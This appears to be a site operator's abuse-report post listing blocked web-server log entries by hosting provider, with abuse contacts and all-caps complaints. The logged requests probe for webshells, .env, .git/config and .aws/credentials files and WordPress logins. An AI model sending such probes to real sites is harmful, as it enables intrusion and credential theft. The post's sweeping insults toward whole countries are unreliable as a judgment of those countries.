149.88.106.161 website.*.com – – [11/Oct/2025:04:08:11 +0200] „GET /wp-admin/classwithtostring.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
149.88.106.161 website.*.com – – [11/Oct/2025:04:08:11 +0200] „GET /wp-content/autoload_classmap.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
… and so on… and so on!!! – VERY UNSECURE PROVIDER!!!

ABUSE-MAIL NR. 3 – WEEKEND!

abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,dmzhostabuse@gmail.com,admin@frantech.ca

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 4 IP´S!!! – THIS IS VERY UNSECURE!!!
ONE AUTOMATIC ANSWER – ABUSE PER EMAIL IS STANDARD!
51.68.46.249 www.website.*.com – – [10/Oct/2025:20:41:59 +0200] „GET /api/index.php/v1/config/application?public=true HTTP/1.0“ 403 – „-“ „python-requests/2.25.1“
+
57.129.99.41 www.website.*.com – – [11/Oct/2025:22:06:17 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; CrOS x86_64 10452.85.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36“
57.129.99.41 www.website.*.com – – [11/Oct/2025:22:06:18 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (X11; CrOS x86_64 10452.85.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36“
+
146.59.209.203 www.website.*.com – – [12/Oct/2025:07:39:07 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0“
146.59.209.203 www.website.*.com – – [12/Oct/2025:07:39:21 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0“
+
188.165.33.227 www.website.*.com – – [12/Oct/2025:13:13:30 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:60.0) Gecko/20100101 Firefox/60.0“
188.165.33.227 www.website.*.com – – [12/Oct/2025:13:13:35 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:60.0) Gecko/20100101 Firefox/60.0“

AS48090 – TECHOFF SRV LIMITED – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE REPORT THIS SINCE SOME WEEKS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
195.178.110.155 www.website.*.com – – [11/Oct/2025:09:25:46 +0200] „GET /.git/config HTTP/1.0“ 403 – „https://website.*.com/.git/config“ „Go-http-client/1.1“
195.178.110.155 www.website.*.com – – [11/Oct/2025:09:25:46 +0200] „GET /.git/config HTTP/1.0“ 403 – „http://website.*.com/.git/config“ „Go-http-client/1.1“

AS53667 – FranTech Solutions – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!
45.61.186.218 www.website.*.com – – [12/Oct/2025:10:06:29 +0200] „GET /wp-json/sure-triggers/v1/automation/action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36“
45.61.186.218 www.website.*.com – – [12/Oct/2025:10:07:44 +0200] „GET / HTTP/1.0“ 403 – „http://www.google.com.hk“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36“

ABUSE-MAIL NR. 4 – WEEKEND!

olatunji822@outlook.com,antispam_zjnoc@163.com,antispam_jx@zjnoc.hz.zj.cn,abuse@constant.com

AS215930 – CIPHER OPERATIONS DOO BEOGRAD – NOVI BEOGRAD – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
WE REPORT THIS SINCE SOME DAYS! THIS PROVIDER DOES NOTHING!!!
62.60.130.229 www.website.*.de – – [10/Oct/2025:23:50:38 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15“
62.60.130.229 www.website.*.de – – [10/Oct/2025:23:50:48 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 12_6_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15“
62.60.130.229 www.website.*.de – – [10/Oct/2025:23:50:48 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36“

AS58461 – CT-HangZhou-IDC – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
CHINA IS VERY UNWANTED AND UNSECURE, COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
183.134.59.131 www.website.*.de – – [11/Oct/2025:02:52:46 +0200] „GET /jx.html HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 7.1.1; zh-cn; MI 6 Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.8.0“
183.134.59.131 www.website.*.de – – [11/Oct/2025:02:52:46 +0200] „GET /index.html HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 7.1.1; zh-cn; MI 6 Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.8.0“
183.134.59.131 www.website.*.de – – [11/Oct/2025:02:52:46 +0200] „GET /chatIndex HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 7.1.1; zh-cn; MI 6 Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.8.0“
183.134.59.131 www.website.*.de – – [11/Oct/2025:02:52:46 +0200] „GET /mobile HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 7.1.1; zh-cn; MI 6 Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.8.0“
183.134.59.131 www.website.*.de – – [11/Oct/2025:02:52:46 +0200] „GET /eapp_1014_172 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; U; Android 7.1.1; zh-cn; MI 6 Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/61.0.3163.128 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.8.0“

AS20473 – The Constant Company, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
64.176.195.163 www.website.*.de – – [12/Oct/2025:18:25:13 +0200] „GET /?check_plugin HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 5 – WEEKEND!

admin@ecotelecom.ru,admin@serveroffer.lt, abuse@serveroffer.lt, support@serveroffer.lt, info@serveroffer.lt,google-cloud-compliance@google.com, network-abuse@google.com

AS50473 – Altagen JSC – VERY UNWANTED AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
RUSSIA IS VERY UNWANTED AND UNSECURE, COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
80.251.227.186 website.*.com – – [10/Oct/2025:19:50:49 +0200] „GET /nf_tracking.php HTTP/1.0“ 302 – „-“ „curl/8.12.1“
80.251.227.186 website.*.com – – [10/Oct/2025:19:50:49 +0200] „GET /MARIJUANA.php HTTP/1.0“ 302 – „-“ „curl/8.12.1“
80.251.227.186 website.*.com – – [10/Oct/2025:19:50:49 +0200] „GET /atomlib.php HTTP/1.0“ 302 – „-“ „curl/8.12.1“
80.251.227.186 website.*.com – – [10/Oct/2025:19:50:49 +0200] „GET /ninjawebshell.php HTTP/1.0“ 302 – „-“ „curl/8.12.1“
80.251.227.186 website.*.com – – [10/Oct/2025:19:50:49 +0200] „GET /mar.php HTTP/1.0“ 302 – „-“ „curl/8.12.1“
80.251.227.186 website.*.com – – [10/Oct/2025:19:50:49 +0200] „GET /marijuana.php HTTP/1.0“ 302 – „-“ „curl/8.12.1“
80.251.227.186 website.*.com – – [10/Oct/2025:19:50:49 +0200] „GET /wp-atom.php HTTP/1.0“ 302 – „-“ „curl/8.12.1“
80.251.227.186 website.*.com – – [10/Oct/2025:19:50:49 +0200] „GET /ninja.php HTTP/1.0“ 302 – „-“ „curl/8.12.1“
80.251.227.186 website.*.com – – [10/Oct/2025:19:50:49 +0200] „GET /shell.php HTTP/1.0“ 302 – „-“ „curl/8.12.1“

AS209605 – UAB Host Baltic – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
WE REPORT THIS SINCE MONTHS AND THIS PROVIDER DOES NOTHING!!! – THIS IS A VERY UNSECURE AND IGNORANT PROVIDER!!!
91.224.92.120 website.*.com – – [11/Oct/2025:00:02:37 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0“
91.224.92.120 website.*.com – – [11/Oct/2025:00:02:47 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0“
91.224.92.120 website.*.com – – [11/Oct/2025:00:02:47 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“

AS396982 – Google LLC – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:51 +0200] „HEAD /blog/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 12; CPH2381) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.163 Mobile Safari/537.36 OPR/76.3.4027.73374“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:51 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:52 +0200] „HEAD /home/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 10; Nokia 2720 Flip) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36 KAIOS/2.5“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:52 +0200] „HEAD /2023/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/124.0.6367.56 Mobile/15E148 Safari/604.1“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:52 +0200] „HEAD /news/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36 OPR/106.0.0.0“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:52 +0200] „HEAD /web/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S918B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/24.0 Chrome/120.0.6099.144 Mobile Safari/537.36“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:52 +0200] „HEAD /fr/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:52 +0200] „HEAD /shop/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.20 Safari/537.36“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:52 +0200] „HEAD /wp/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 12_7_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:52 +0200] „HEAD /website/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.62 Safari/537.36“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:53 +0200] „HEAD /backup/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S918B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/24.0 Chrome/120.0.6099.144 Mobile Safari/537.36“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:53 +0200] „HEAD /v2/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.56 Mobile Safari/537.36“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:53 +0200] „HEAD /content/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:53 +0200] „HEAD /us/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.86 Safari/537.36 Brave/1.62.162“
136.114.235.184 website.*.com – – [11/Oct/2025:03:23:53 +0200] „HEAD /store/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
… and so on… and so on!!! – VERY UNSECURE PROVIDER!!!

ABUSE-MAIL NR. 6 – WEEKEND!

abuse@datacamp.co.uk,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@bunea.eu

AS60068 – Datacamp Limited – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ABUSE-MAIL NR. 3 FROM WEEKEND!!! – VERY UNSECURE PROVIDER!!!
ONLY 1 AUTOMATIC ANSWER!!! WE REPORT THIS SINCE SOME DAYS! THIS PROVIDER DOES NOTHING!!!
95.173.216.42 website.*.de – – [10/Oct/2025:20:48:45 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
95.173.216.42 website.*.de – – [10/Oct/2025:20:48:48 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
95.173.216.42 website.*.de – – [10/Oct/2025:20:48:58 +0200] „GET /test.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
95.173.216.42 website.*.de – – [10/Oct/2025:20:49:09 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
95.173.216.42 website.*.de – – [10/Oct/2025:20:49:11 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
95.173.216.42 website.*.de – – [10/Oct/2025:20:49:14 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
95.173.216.42 website.*.de – – [10/Oct/2025:20:49:17 +0200] „GET /index.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
95.173.216.42 website.*.de – – [10/Oct/2025:20:49:28 +0200] „GET /.aws/credentials HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONE AUTOMATIC ANSWER – ABUSE PER EMAIL IS STANDARD!
51.68.46.249 website.*.de – – [11/Oct/2025:09:21:56 +0200] „GET /api/index.php/v1/config/application?public=true HTTP/1.0“ 403 – „-“ „python-requests/2.25.1“

AS204428 – SS-Net – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
80.94.95.234 website.*.de – – [11/Oct/2025:10:01:15 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „-“
80.94.95.234 website.*.de – – [11/Oct/2025:10:01:15 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „-“
80.94.95.234 website.*.de – – [11/Oct/2025:10:01:15 +0200] „GET /info HTTP/1.0“ 403 – „-“ „-“
80.94.95.234 website.*.de – – [11/Oct/2025:10:01:15 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „-“
80.94.95.234 website.*.de – – [11/Oct/2025:10:01:15 +0200] „GET /info.php HTTP/1.0“ 302 – „-“ „-“
80.94.95.234 website.*.de – – [11/Oct/2025:10:01:15 +0200] „GET /phpmyinfo HTTP/1.0“ 403 – „-“ „-“

ABUSE-MAIL NR. 7 – WEEKEND!

abuse@amazonaws.com, trustandsafety@support.aws.com,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse@invitesys.ro,abuse@convergeict.com

AS14618 – Amazon.com, Inc. – VERY GOOD PROVIDER! – ALWAYS STOP THIS HACKER-IDIOTS!
ALWAYS ANSWERED IN OUR ABUSE EMAILS! GIVE ALWAYS INFO AFTER FIRST ANSWER WHEN IT´S STOPPED!
34.229.164.104 website.*.com – – [11/Oct/2025:06:10:02 +0200] „GET /dup-installer/main.installer.php HTTP/1.0“ 403 – „-“ „Python-urllib/2.7“

INVITE Systems – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
VERY PENETRENT UND UNWANTED STUPID ATTEMPTS – BOT- S H I T!!!
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:01:24 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:01:27 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:01:47 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:01:49 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:02:40 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:02:41 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:02:50 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:02:52 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:02:58 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:02:59 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:03:40 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:03:43 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:03:59 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.210 www.website.*.com – – [11/Oct/2025:07:04:00 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“

AS17639 – Converge ICT Solutions Inc. – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
143.44.197.117 website.*.com – – [12/Oct/2025:14:51:56 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.2; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/12.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 8 – WEEKEND!

abuse@mnet.bg,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,olatunji822@outlook.com

AS21230 – M SAT Cable EAD – IS NOW ALSO – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE BLOCK ALSO ISP WITH HACKER-IDIOTS!
84.43.247.74 website.*.com – – [11/Oct/2025:03:57:22 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONE AUTOMATIC ANSWER – ABUSE PER EMAIL IS STANDARD!
51.195.74.55 website.*.com – – [11/Oct/2025:07:11:51 +0200] „GET /wp-admin/maint/maint.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.195.74.55 website.*.com – – [11/Oct/2025:07:11:51 +0200] „GET /wp-admin/css/colors/ocean/colors.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

AS215930 – CIPHER OPERATIONS DOO BEOGRAD – NOVI BEOGRAD – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S! – VERY UNSECURE PROVIDER!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
WE REPORT THIS SINCE SOME DAYS! THIS PROVIDER DOES NOTHING!!!
62.60.130.228 website.*.com – – [11/Oct/2025:09:30:52 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.130 Safari/537.36“
62.60.130.228 website.*.com – – [11/Oct/2025:09:31:02 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://twitter.com/“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0.1) Gecko/20100101 Firefox/120.0.1“
62.60.130.228 website.*.com – – [11/Oct/2025:09:31:02 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36“
+
62.60.130.213 website.*.com – – [11/Oct/2025:20:02:55 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
62.60.130.213 website.*.com – – [11/Oct/2025:20:03:06 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“
62.60.130.213 website.*.com – – [11/Oct/2025:20:03:06 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 9 – WEEKEND!

abuse@cheapy.host,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,

AS401120 – cheapy.host LLC – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ABUSE-MAIL 3 FROM WEEKEND!!! – HERE WITH 2 IP´S!!! – WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.86.100 website.*.com – – [11/Oct/2025:07:14:04 +0200] „GET //wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“
196.251.86.13 website.*.com – – [11/Oct/2025:11:35:20 +0200] „GET /sites/all/libraries/plupload/examples/upload.php HTTP/1.0“ 403 – „-“ „ALittle Client“

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONE AUTOMATIC ANSWER – ABUSE PER EMAIL IS STANDARD!
142.44.241.246 website.*.com – – [11/Oct/2025:16:33:13 +0200] „GET / HTTP/1.0“ 403 – „-“ „Python/3.13 aiohttp/3.12.15“
142.44.241.246 website.*.com – – [11/Oct/2025:16:33:15 +0200] „GET / HTTP/1.0“ 403 – „-“ „Python/3.13 aiohttp/3.12.15“

ABUSE-MAIL NR. 10 – WEEKEND!

abuse@cheapy.host,cor@telemidia.net.br,mail-abuse@cert.br,IARPOC@Newfold.com,abuse@unifiedlayer.com,eig-net-team@endurance.com

AS401120 – cheapy.host LLC – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ABUSE-MAIL 3 FROM WEEKEND!!! – WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.86.13 website.*.com – – [11/Oct/2025:10:21:16 +0200] „GET /sites/all/libraries/plupload/examples/upload.php HTTP/1.0“ 403 – „-“ „ALittle Client“

